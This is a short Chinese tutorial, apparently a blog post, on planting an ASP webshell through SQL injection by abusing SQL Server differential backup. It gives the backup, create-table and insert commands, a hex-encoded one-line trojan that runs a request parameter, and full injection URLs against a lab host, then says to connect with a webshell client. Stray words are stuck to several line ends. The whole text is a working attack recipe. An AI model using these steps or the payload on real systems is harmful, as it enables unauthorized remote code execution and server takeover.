简介
差别备份数据库获得webshell。在sql server 里dbo和sa权限都有备份数据库权限,咱们能够把数据库备份称asp文件,这样咱们就能够经过mssqlserver的备份数据库功能生成一个网页小马。web
差别备份的流程大概这样:
1.完整备份一次(保存位置固然能够改)sql
backup database 库名 to disk = 'c:\ddd.bak';--
2.建立表并插入数据shell
create table [dbo].[dtest] ([cmd] [image]);-- insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
3.进行差别备份数据库
backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
上面sqlserver
0x3C25657865637574652872657175657374282261222929253E
就是一句话木马的内容:<%execute(request("a"))%>
例子
测试例子中我目标网站的绝对路径是E:\wwwroot\asp_sqli,数据库名是asp_test测试
一、网站
http://192.168.5.21:81/index.asp?id=1;backup%20database%20asp_test%20to%20disk%20=%27E:\wwwroot\asp_sqli\ddd.bak%27;--
二、spa
http://192.168.5.21:81/index.asp?id=1;create%20table%20[dbo].[dtest]%20([cmd][image]);--
http://192.168.5.21:81/index.asp?id=1;insert%20into%20dtest(cmd)values(0x3C25657865637574652872657175657374282261222929253E);--
三、3d
http://192.168.5.21:81/index.asp?id=1;backup%20database%20asp_test%20to%20disk=%27E:\wwwroot\asp_sqli\d.asp%27%20WITH%20DIFFERENTIAL,FORMAT;--
菜刀链接d.asp便可。code